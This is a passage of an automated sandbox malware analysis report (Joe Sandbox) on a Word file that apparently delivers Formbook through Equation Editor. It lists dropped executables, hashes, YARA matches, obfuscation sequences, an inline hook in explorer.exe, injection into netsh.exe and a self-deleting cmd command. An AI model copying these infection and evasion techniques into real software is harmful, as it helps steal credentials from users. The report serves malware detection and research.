Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009FE0C6 6_2_009FE0C6
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A2D005 6_2_00A2D005
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A03040 6_2_00A03040
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A1905A 6_2_00A1905A
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009FE2E9 6_2_009FE2E9
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00AA1238 6_2_00AA1238
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00AA63BF 6_2_00AA63BF
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009FF3CF 6_2_009FF3CF
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A263DB 6_2_00A263DB
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A02305 6_2_00A02305
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A4A37B 6_2_00A4A37B
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A07353 6_2_00A07353
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A35485 6_2_00A35485
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A11489 6_2_00A11489
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A8443E 6_2_00A8443E
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A3D47D 6_2_00A3D47D
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A1C5F0 6_2_00A1C5F0
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A0351F 6_2_00A0351F
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A46540 6_2_00A46540
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A04680 6_2_00A04680
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A0E6C1 6_2_00A0E6C1
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00AA2622 6_2_00AA2622
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A4A634 6_2_00A4A634
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A0C7BC 6_2_00A0C7BC
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A8579A 6_2_00A8579A
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A357C3 6_2_00A357C3
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A9F8EE 6_2_00A9F8EE
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A2286D 6_2_00A2286D
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A0C85C 6_2_00A0C85C
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A029B2 6_2_00A029B2
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00AA098E 6_2_00AA098E
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A169FE 6_2_00A169FE
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A8394B 6_2_00A8394B
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A85955 6_2_00A85955
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00AB3A83 6_2_00AB3A83
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00AACBA4 6_2_00AACBA4
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009FFBD7 6_2_009FFBD7
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A8DBDA 6_2_00A8DBDA
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A27B00 6_2_00A27B00
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A9FDDD 6_2_00A9FDDD
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A30D3B 6_2_00A30D3B
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A0CD5B 6_2_00A0CD5B
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A32E2F 6_2_00A32E2F
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A1EE4C 6_2_00A1EE4C
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A9CFB1 6_2_00A9CFB1
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A72FDC 6_2_00A72FDC
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A10F3F 6_2_00A10F3F
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00A2DF7C 6_2_00A2DF7C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C9E0C6 8_2_00C9E0C6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CA3040 8_2_00CA3040
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CB905A 8_2_00CB905A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D1D06D 8_2_00D1D06D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CCD005 8_2_00CCD005
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C9E2E9 8_2_00C9E2E9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D41238 8_2_00D41238
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C9F3CF 8_2_00C9F3CF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CC63DB 8_2_00CC63DB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D463BF 8_2_00D463BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CA7353 8_2_00CA7353
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CEA37B 8_2_00CEA37B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CA2305 8_2_00CA2305
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CB1489 8_2_00CB1489
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CD5485 8_2_00CD5485
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CDD47D 8_2_00CDD47D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D2443E 8_2_00D2443E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CBC5F0 8_2_00CBC5F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CE6540 8_2_00CE6540
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CA351F 8_2_00CA351F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CAE6C1 8_2_00CAE6C1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CA4680 8_2_00CA4680
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D42622 8_2_00D42622
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CEA634 8_2_00CEA634
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CD57C3 8_2_00CD57C3
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D2579A 8_2_00D2579A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CAC7BC 8_2_00CAC7BC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D3F8EE 8_2_00D3F8EE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CAC85C 8_2_00CAC85C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CC286D 8_2_00CC286D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CB69FE 8_2_00CB69FE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D4098E 8_2_00D4098E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CA29B2 8_2_00CA29B2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D25955 8_2_00D25955
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D2394B 8_2_00D2394B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D53A83 8_2_00D53A83
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D2DBDA 8_2_00D2DBDA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C9FBD7 8_2_00C9FBD7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D4CBA4 8_2_00D4CBA4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CC7B00 8_2_00CC7B00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D3FDDD 8_2_00D3FDDD
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CACD5B 8_2_00CACD5B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CD0D3B 8_2_00CD0D3B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CBEE4C 8_2_00CBEE4C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CD2E2F 8_2_00CD2E2F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D12FDC 8_2_00D12FDC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D3CFB1 8_2_00D3CFB1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CCDF7C 8_2_00CCDF7C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CB0F3F 8_2_00CB0F3F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009E004 8_2_0009E004
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00082D87 8_2_00082D87
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00082D90 8_2_00082D90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00089E40 8_2_00089E40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00082FB0 8_2_00082FB0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe 4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\princedan85671.exe 4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\princedan85671.exe 4DC8CB12314311A3BF1B1AFA5CC5483284FDA573F18C15AB0FEF18B7B9EF9F98
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: String function: 00A6F970 appears 84 times
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: String function: 00A43F92 appears 132 times
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: String function: 00A4373B appears 245 times
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: String function: 009FE2A8 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: String function: 009FDF5C appears 119 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 00D0F970 appears 84 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 00C9E2A8 appears 38 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 00CE373B appears 245 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 00CE3F92 appears 132 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 00C9DF5C appears 121 times
PE file contains strange resources
Source: princedanx[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: princedanx[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: princedan85671.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: princedan85671.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: princedan85671.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: princedan85671.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.princedan85671.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.princedan85671.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2345133773.0000000000260000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2223580519.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2182627662.0000000003596000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2182570687.00000000034FC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2344959311.0000000000180000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2223311731.00000000000F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2223524102.00000000002D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2344652337.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2182506194.0000000003459000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: princedanx[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: princedan85671.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: princedan85671.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: explorer.exe, 00000007.00000000.2193639072.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@9/10@4/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$OTATION1100630004R2.doc Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC744.tmp Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: QUOTATION1100630004R2.doc Virustotal: Detection: 33%
Source: QUOTATION1100630004R2.doc ReversingLabs: Detection: 34%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\princedan85671.exe C:\Users\user\AppData\Roaming\princedan85671.exe
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process created: C:\Users\user\AppData\Local\Temp\princedan85671.exe C:\Users\user\AppData\Local\Temp\princedan85671.exe vgyjnbhui
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\princedan85671.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\princedan85671.exe C:\Users\user\AppData\Roaming\princedan85671.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Process created: C:\Users\user\AppData\Local\Temp\princedan85671.exe C:\Users\user\AppData\Local\Temp\princedan85671.exe vgyjnbhui Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\princedan85671.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\princedan85671.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: netsh.pdb source: princedan85671.exe, 00000006.00000002.2223629114.0000000000614000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: princedan85671.exe, netsh.exe

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Code function: 4_2_001D48B5 push eax; retf 4_2_001D48B6
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Code function: 4_2_001D29DF push eax; retf 4_2_001D29E0
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Code function: 4_2_005B1E8E push 8B034575h; retf 4_2_005B1E98
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Code function: 4_2_005B1787 push esi; ret 4_2_005B1791
Source: C:\Users\user\AppData\Roaming\princedan85671.exe Code function: 4_2_00692030 push ss; iretd 4_2_00692031
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_004168E0 push eax; iretd 6_2_004168E1
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00416907 push ds; retf 6_2_00416908
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_004093D6 push es; retf 6_2_004093DD
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_00416CB4 pushfd ; retf 6_2_00416CBC
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_004176ED push ebx; iretd 6_2_004176EF
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_0041CEB5 push eax; ret 6_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_0041CF6C push eax; ret 6_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_0041CF02 push eax; ret 6_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_0041CF0B push eax; ret 6_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\princedan85671.exe Code function: 6_2_009FDFA1 push ecx; ret 6_2_009FDFB4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C9DFA1 push ecx; ret 8_2_00C9DFB4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_000893D6 push es; retf 8_2_000893DD
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_000976ED push ebx; iretd 8_2_000976EF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_000968E0 push eax; iretd 8_2_000968E1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00096907 push ds; retf 8_2_00096908
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00096CB4 pushfd ; retf 8_2_00096CBC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009CEB5 push eax; ret 8_2_0009CF08
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009CF0B push eax; ret 8_2_0009CF72
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009CF02 push eax; ret 8_2_0009CF08
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009CF6C push eax; ret 8_2_0009CF72

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Users\user\AppData\Roaming\princedan85671.exe File created: C:\Users\user\AppData\Local\Temp\princedan85671.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\princedan85671.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\princedanx[1].exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xE5
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
